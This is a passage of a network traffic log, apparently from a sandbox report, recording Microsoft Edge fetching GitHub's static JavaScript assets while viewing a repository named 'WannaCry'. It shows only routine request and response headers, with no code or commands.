vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a9c9ff8bdf597b94f75cd2d86ba3116bd49fa511
content-length: 3258
GET

https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-00df584d9e79.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_ref-selector_ts-00df584d9e79.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:41:16 GMT
etag: "0x8DCEDF097027E55"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 25513
x-served-by: cache-iad-kjyo7100071-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 37, 1032
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b8585c7fd56bc1243882405448ab1a1dff5b70d3
content-length: 7031
GET

https://github.githubassets.com/assets/codespaces-98a04584b02d.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/codespaces-98a04584b02d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
content-md5: 3weht2CpValUkHj9FvGZNA==
last-modified: Wed, 14 Aug 2024 19:47:47 GMT
etag: "0x8DCBC99F962FB97"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 3829277
x-served-by: cache-iad-kjyo7100078-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 4928, 71482
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f55eab1e4a0296b367eafe94cab2c1a2ffe31b5f
content-length: 3364
GET

https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-cdab1b-03eba6ef6933.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-cdab1b-03eba6ef6933.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A0C1B6EE"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 3604147
x-served-by: cache-iad-kiad7000080-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 6180, 43359
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: dcc3334095332bc562f20d92a12b64dc030c4757
content-length: 2607
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-a6774a3bb897.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-a6774a3bb897.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 17 Oct 2024 13:18:08 GMT
etag: "0x8DCEEAE2455F349"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 25514
x-served-by: cache-iad-kcgs7200085-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 26, 988
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cee4780aa8e5252a8d25ccd9dbcf007d27b3c6b3
content-length: 17912
GET

https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--b0e14d-dac8f7484f9f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--b0e14d-dac8f7484f9f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 15 Oct 2024 13:11:04 GMT
etag: "0x8DCED1AD3458B06"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 115330
x-served-by: cache-iad-kiad7000032-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 15, 3898
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4789ae3293e42361466526b9313f4f44ecfee235
content-length: 3377
GET

https://github.githubassets.com/assets/repositories-8e899871191b.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/repositories-8e899871191b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:41:14 GMT
etag: "0x8DCEDF0965291D0"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 25521
x-served-by: cache-iad-kjyo7100021-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 35, 1717
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0870e965d90a1448cfc25d496fb807e1485bf6bb
content-length: 60666
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-e73b311a14f1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-e73b311a14f1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:41:14 GMT
etag: "0x8DCEDF09613111A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 25521
x-served-by: cache-iad-kjyo7100054-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 35, 1703
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f92dac61083e608ea5a4706f5ba7899d9cd38508
content-length: 4526
GET

https://github.githubassets.com/assets/code-menu-045752d47d8a.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/code-menu-045752d47d8a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 23 Jul 2024 20:26:54 GMT
etag: 0x8DCAB55CAE8ABD4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 5048756
x-served-by: cache-iad-kiad7000040-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 23, 51159
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 302fd4bb8ee67fea4106cad2c718d9de3677589a
content-length: 3888
GET

https://github.githubassets.com/assets/primer-react-65b92279806c.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/primer-react-65b92279806c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 07:22:44 GMT
etag: "0x8DCDD32D933354D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1948819
x-served-by: cache-iad-kiad7000165-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 30, 36958
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 05fe7ac57b3c8809911d279a4a9c7ed322f67084
content-length: 4537
GET

https://github.githubassets.com/assets/react-core-0fac99d367d3.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/react-core-0fac99d367d3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 19 Sep 2024 22:11:30 GMT
etag: "0x8DCD8F803DB004C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 2082029
x-served-by: cache-iad-kiad7000101-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 95, 37546
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8c928917fadfa0a30eac74e3288a44ae6020e8fa
content-length: 4342
GET

https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/react-lib-7b7b5264f6c1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 22:32:14 GMT
etag: "0x8DCEE326277A1AA"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 60882
x-served-by: cache-iad-kiad7000069-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 35, 4331
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6575cdc574777f04b322060acec62c6e15f620ad
content-length: 102121
GET

https://github.githubassets.com/assets/octicons-react-45c3a19dd792.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/octicons-react-45c3a19dd792.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:05 GMT
etag: "0x8DCE31279037ABD"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1236188
x-served-by: cache-iad-kjyo7100111-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 34, 20364
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c23bc4581b928c89b220ab365f547a7a2f42980b
content-length: 7283
GET

https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-41da55-1851acd376ff.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-41da55-1851acd376ff.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 14 Oct 2024 18:39:55 GMT
etag: "0x8DCEC7F994E4E0C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 107755
x-served-by: cache-iad-kiad7000104-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 3, 5088
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: bb2f6e9213bf9d9f7551175ae921adb3fb686b2d
content-length: 3424
GET

https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-4896ddd4b7bb.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-4896ddd4b7bb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 17 Oct 2024 14:36:09 GMT
etag: "0x8DCEEB90AE12A3D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 17712
x-served-by: cache-iad-kcgs7200168-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 99
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 84ae0ef8fee2de368d7402862831e06047368c83
content-length: 3995
GET

https://github.githubassets.com/assets/notifications-subscriptions-menu-e42e1b53054c.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/notifications-subscriptions-menu-e42e1b53054c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 20 Aug 2024 15:46:26 GMT
etag: "0x8DCC12F400738CD"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 4274862
x-served-by: cache-iad-kjyo7100129-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 4, 71384
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 37051fad116685f746a1dc08c0120aa0886a179c
content-length: 3038
GET

https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hotkey_dist_index_js-no-d67c7f-bd7d077cdcb1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hotkey_dist_index_js-no-d67c7f-bd7d077cdcb1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A13028DA"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 3627783
x-served-by: cache-iad-kcgs7200022-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 3451, 60313
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a6cecad463028ae4e4498f3805bb52e39a04045c
content-length: 5219
GET

https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-d25fac54a6bc.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_ui-commands_ui-commands_ts-d25fac54a6bc.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 19:02:59 GMT
etag: "0x8DCEE15273FFD12"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 60843
x-served-by: cache-iad-kjyo7100064-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 61, 3055
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 76cf4c38a5c8f172ea5c4c18207d9048e5e51841
content-length: 7392
GET

https://github.githubassets.com/assets/keyboard-shortcuts-dialog-a549d5821edb.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/keyboard-shortcuts-dialog-a549d5821edb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 24 Sep 2024 22:14:24 GMT
etag: "0x8DCDCE63FB53FCA"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1818329
x-served-by: cache-iad-kcgs7200152-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 140, 28174
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d92b7b5cb99bbf43f26812a9e6ebc69a4b45400e
content-length: 3088
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 18:15:49 GMT
etag: "0x8DCE4A09364EC4B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 876500
x-served-by: cache-iad-kjyo7100058-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 21, 31234
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a17c4824aebe2c623af1637a8b49c698dae96d05
content-length: 3077
GET

https://github.githubassets.com/assets/sessions-b83865e93139.js

msedge.exe

Remote address:

